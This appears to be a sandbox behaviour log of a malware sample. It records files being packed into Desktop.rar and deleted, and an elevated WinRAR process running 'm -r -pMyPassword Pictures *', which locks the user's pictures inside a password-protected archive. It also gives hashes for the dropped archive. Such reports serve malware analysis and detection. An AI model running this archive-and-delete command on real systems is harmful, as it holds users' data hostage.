COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 69760 True 1
Fn
Data
File Write filename = Desktop.rar, size = 117 True 1
Fn
Data
File Create filename = wfNksu nJRG5\GeJdlc0asWB3ISPXdFJ8.csv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904516 True 1
Fn
System Get Time type = Ticks, time = 10904516 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 80885107852 True 1
Fn
File Read filename = wfNksu nJRG5\GeJdlc0asWB3ISPXdFJ8.csv, size = 1048576, size_out = 26584 True 1
Fn
Data
File Read filename = wfNksu nJRG5\GeJdlc0asWB3ISPXdFJ8.csv, size = 1021992, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904516 True 1
Fn
System Get Time type = Performance Ctr, time = 80885327953 True 1
Fn
System Get Time type = Ticks, time = 10904516 True 3
Fn
System Get Time type = Ticks, time = 10904532 True 1
Fn
System Get Time type = Performance Ctr, time = 80885671823 True 1
Fn
System Get Time type = Ticks, time = 10904532 True 3
Fn
File Write filename = Desktop.rar, size = 26672 True 1
Fn
Data
File Write filename = Desktop.rar, size = 121 True 1
Fn
Data
File Create filename = wfNksu nJRG5\qHh6uE8iAnd.xls, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904532 True 1
Fn
System Get Time type = Ticks, time = 10904532 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 80886086302 True 1
Fn
File Read filename = wfNksu nJRG5\qHh6uE8iAnd.xls, size = 1048576, size_out = 79803 True 1
Fn
Data
File Read filename = wfNksu nJRG5\qHh6uE8iAnd.xls, size = 968773, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904532 True 1
Fn
System Get Time type = Performance Ctr, time = 80886245567 True 1
Fn
System Get Time type = Ticks, time = 10904532 True 4
Fn
System Get Time type = Performance Ctr, time = 80886835388 True 1
Fn
System Get Time type = Ticks, time = 10904532 True 3
Fn
File Write filename = Desktop.rar, size = 79952 True 1
Fn
Data
File Write filename = Desktop.rar, size = 112 True 1
Fn
Data
File Create filename = wfNksu nJRG5\RFLcwh3Vitv1c_T4nL.avi, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904547 True 1
Fn
System Get Time type = Ticks, time = 10904547 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 84386496912 True 1
Fn
File Read filename = wfNksu nJRG5\RFLcwh3Vitv1c_T4nL.avi, size = 1048576, size_out = 86131 True 1
Fn
Data
File Read filename = wfNksu nJRG5\RFLcwh3Vitv1c_T4nL.avi, size = 962445, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904547 True 1
Fn
System Get Time type = Performance Ctr, time = 84386775422 True 1
Fn
System Get Time type = Ticks, time = 10904547 True 1
Fn
System Get Time type = Ticks, time = 10904547 True 1
Fn
System Get Time type = Ticks, time = 10904547 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10904563 True 1
Fn
System Get Time type = Performance Ctr, time = 84387678791 True 1
Fn
System Get Time type = Ticks, time = 10904563 True 3
Fn
File Write filename = Desktop.rar, size = 86352 True 1
Fn
Data
File Write filename = Desktop.rar, size = 119 True 1
Fn
Data
File Create filename = wfNksu nJRG5\WIsnHaDYoZ0.ppt, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904563 True 1
Fn
System Get Time type = Ticks, time = 10904563 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 84388168487 True 1
Fn
File Read filename = wfNksu nJRG5\WIsnHaDYoZ0.ppt, size = 1048576, size_out = 27218 True 1
Fn
Data
File Read filename = wfNksu nJRG5\WIsnHaDYoZ0.ppt, size = 1021358, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904563 True 1
Fn
System Get Time type = Performance Ctr, time = 84388441405 True 1
Fn
System Get Time type = Ticks, time = 10904563 True 3
Fn
System Get Time type = Ticks, time = 10904657 True 1
Fn
System Get Time type = Performance Ctr, time = 84400037334 True 1
Fn
System Get Time type = Ticks, time = 10904657 True 3
Fn
File Write filename = Desktop.rar, size = 27280 True 1
Fn
Data
File Write filename = Desktop.rar, size = 112 True 1
Fn
Data
File Create filename = wfNksu nJRG5\XTt3.swf, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904657 True 1
Fn
System Get Time type = Ticks, time = 10904657 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 84400523644 True 1
Fn
File Read filename = wfNksu nJRG5\XTt3.swf, size = 1048576, size_out = 33177 True 1
Fn
Data
File Read filename = wfNksu nJRG5\XTt3.swf, size = 1015399, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904657 True 1
Fn
System Get Time type = Performance Ctr, time = 84400712315 True 1
Fn
System Get Time type = Ticks, time = 10904657 True 3
Fn
System Get Time type = Ticks, time = 10904672 True 1
Fn
System Get Time type = Performance Ctr, time = 84401042596 True 1
Fn
System Get Time type = Ticks, time = 10904672 True 3
Fn
File Write filename = Desktop.rar, size = 33312 True 1
Fn
Data
File Write filename = Desktop.rar, size = 105 True 1
Fn
Data
File Create filename = wfNksu nJRG5\_acNQOwErx 4yX.mp3, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904672 True 1
Fn
System Get Time type = Ticks, time = 10904672 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 84401507454 True 1
Fn
File Read filename = wfNksu nJRG5\_acNQOwErx 4yX.mp3, size = 1048576, size_out = 99959 True 1
Fn
Data
File Read filename = wfNksu nJRG5\_acNQOwErx 4yX.mp3, size = 948617, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904672 True 1
Fn
System Get Time type = Performance Ctr, time = 84401802355 True 1
Fn
System Get Time type = Ticks, time = 10904672 True 3
Fn
System Get Time type = Ticks, time = 10904688 True 1
Fn
System Get Time type = Performance Ctr, time = 84402663786 True 1
Fn
System Get Time type = Ticks, time = 10904688 True 3
Fn
File Write filename = Desktop.rar, size = 100224 True 1
Fn
Data
File Write filename = Desktop.rar, size = 115 True 1
Fn
Data
File Create filename = xipMOvrpEcaMKsnrOoK.m4a, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904688 True 1
Fn
System Get Time type = Ticks, time = 10904688 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 87902321077 True 1
Fn
File Read filename = xipMOvrpEcaMKsnrOoK.m4a, size = 1048576, size_out = 67031 True 1
Fn
Data
File Read filename = xipMOvrpEcaMKsnrOoK.m4a, size = 981545, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904688 True 1
Fn
System Get Time type = Performance Ctr, time = 87902649367 True 1
Fn
System Get Time type = Ticks, time = 10904688 True 1
Fn
System Get Time type = Ticks, time = 10904688 True 1
Fn
System Get Time type = Ticks, time = 10904688 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10904703 True 1
Fn
System Get Time type = Performance Ctr, time = 91404761946 True 1
Fn
System Get Time type = Ticks, time = 10904703 True 1
Fn
System Get Time type = Ticks, time = 10904703 True 1
Fn
System Get Time type = Ticks, time = 10904703 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 67232 True 1
Fn
Data
File Write filename = Desktop.rar, size = 107 True 1
Fn
Data
System Get Time type = Ticks, time = 10904703 True 1
Fn
System Get Time type = Ticks, time = 10904703 True 1
Fn
File Write filename = Desktop.rar, size = 47 True 1
Fn
Data
System Get Time type = Ticks, time = 10904703 True 1
Fn
System Get Time type = Ticks, time = 10904703 True 1
Fn
File Write filename = Desktop.rar, size = 43 True 1
Fn
Data
System Get Time type = Ticks, time = 10906903 True 1
Fn
System Get Time type = Performance Ctr, time = 91624477958 True 1
Fn
System Get Time type = Ticks, time = 10906903 True 1
Fn
System Get Time type = Ticks, time = 10906903 True 1
Fn
System Get Time type = Ticks, time = 10906903 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 18 True 1
Fn
Data
File Write filename = Desktop.rar, size = 19 True 1
Fn
Data
File Write filename = Desktop.rar, size = 3613 True 1
Fn
Data
File Write filename = Desktop.rar, size = 8 True 1
Fn
Data
File Delete filename = xipMOvrpEcaMKsnrOoK.m4a True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Performance Ctr, time = 95178123222 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
File Delete filename = wfNksu nJRG5\_acNQOwErx 4yX.mp3 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Performance Ctr, time = 95178534783 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 2
Fn
File Delete filename = wfNksu nJRG5\XTt3.swf True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Performance Ctr, time = 95178728535 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 2
Fn
File Delete filename = wfNksu nJRG5\WIsnHaDYoZ0.ppt True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Performance Ctr, time = 95178897113 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 2
Fn
File Delete filename = wfNksu nJRG5\RFLcwh3Vitv1c_T4nL.avi True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Performance Ctr, time = 95179033290 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 2
Fn
File Delete filename = wfNksu nJRG5\qHh6uE8iAnd.xls True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Performance Ctr, time = 95179171378 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 2
Fn
File Delete filename = wfNksu nJRG5\GeJdlc0asWB3ISPXdFJ8.csv True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Performance Ctr, time = 95179323493 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 2
Fn
File Delete filename = wfNksu nJRG5\3rrOtsNWKjt8qLje.swf True 1
Fn
System Get Time type = Ticks, time = 10907433 True 1
Fn
System Get Time type = Ticks, time = 10907433 True 1
Fn
System Get Time type = Performance Ctr, time = 95179485161 True 1
Fn
System Get Time type = Ticks, time = 10907433 True 2
Fn
File Delete Directory directory = wfNksu nJRG5 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95188972497 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = w9CVHhfkQl0.mkv True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95189137591 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = TYcyuRxH.mkv True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95189424913 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = Qes6-o-.docx True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95189590127 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = PWldfUkUS.mp3 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95189744521 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = MKzdWyU3NziO.m4a True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95189896346 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = LFfk9JORsG.avi True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95190048082 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = L4T8mDg3vHms9Y.xls True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95190198437 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = JhTtCfiuDFLeGwcL.bmp True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Performance Ctr, time = 95190371125 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 2
Fn
File Delete filename = jGh255P.m4a True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Performance Ctr, time = 95190632390 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 2
Fn
File Delete filename = HAuM_g1AD_0J.mp4 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Performance Ctr, time = 95190834492 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 2
Fn
File Delete filename = gblyrzexggw.exe True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Performance Ctr, time = 95191087031 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 2
Fn
File Delete filename = FuvJMN.m4a True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Performance Ctr, time = 95191240036 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 2
Fn
For performance reasons, the remaining 89 entries are omitted.
The remaining entries can be found in glog.xml.
Process #7: winrar.exe
Information Value
ID #7
File Name c:\users\whuoxysd\appdata\local\temp\winrar.exe
Command Line C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Pictures *
Initial Working Directory C:\Users\WhuOXYsD\Pictures\
Monitor Start Time: 00:00:46, Reason: Child Process
Unmonitor End Time: 00:01:08, Reason: Self Terminated
Monitor Duration 00:00:22
OS Process Information
Information Value
PID 0x6ac
Parent PID 0x244 (c:\windows\syswow64\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Dropped Files
Information Value
Filename Pictures.rar
File Size 9.10 MB
MD5: 7bf2ee95ffc00b4496762468e4227d44
SHA1: f93457257e95c65a24ddc307132053c00c5a5b08
SHA256: 1e0611ee8df0cd446b1d7aa1c6719e4c42fddd6b51db155422cbe0c06b8e03b6
SSDeep: 196608:Oqc0UeJbHEOp0EV3pDYcBVrj7SzekHBhZk22Vp8QBvxWuH1e:MCJI+0gJYcPNCvkV8QOuQ
YARA Match False
Threads
Thread 0xa10
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-04-02 12:04:15 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 12515963894 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x7fef7a20000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x77af7190 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x77afbd90 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x7fef7a20000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x77af7190 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x77b03520 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x77afbd90 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 2
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x77b2b710 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77c384f0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x77b2b230 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x77c200b0 True 1
Fn
System Get Time type = Performance Ctr, time = 12517499009 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetDllDirectoryW, address_out = 0x77b2d8c0 True 1
Fn
File Add Search Path - True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, base_address = 0x13f160000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS True 1
Fn
Module Get Filename process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.ini, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.ini, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\WinRAR.ini, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\WinRAR.ini, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, base_address = 0x0 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
File Create filename = C:\Users\WhuOXYsD\AppData\Local\Temp\winrar.lng, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\winrar.lng, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\riched20.dll, base_address = 0x7fef7980000 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, size = 32, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Default, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcName False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileNames False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ImmExec, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ExclNames, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = StoreNames, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = UseRAR, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RAR5, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXModule, size = 2, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFX False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXIcon, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXLogo, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXElevate, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtFile, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtDataWide, size = 2, type = REG_BINARY True 1
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolumeSize, data = 0, size = 4, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolSizeMod, data = 2, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolPause, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OldVolNames, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecVolNumber, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Update, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
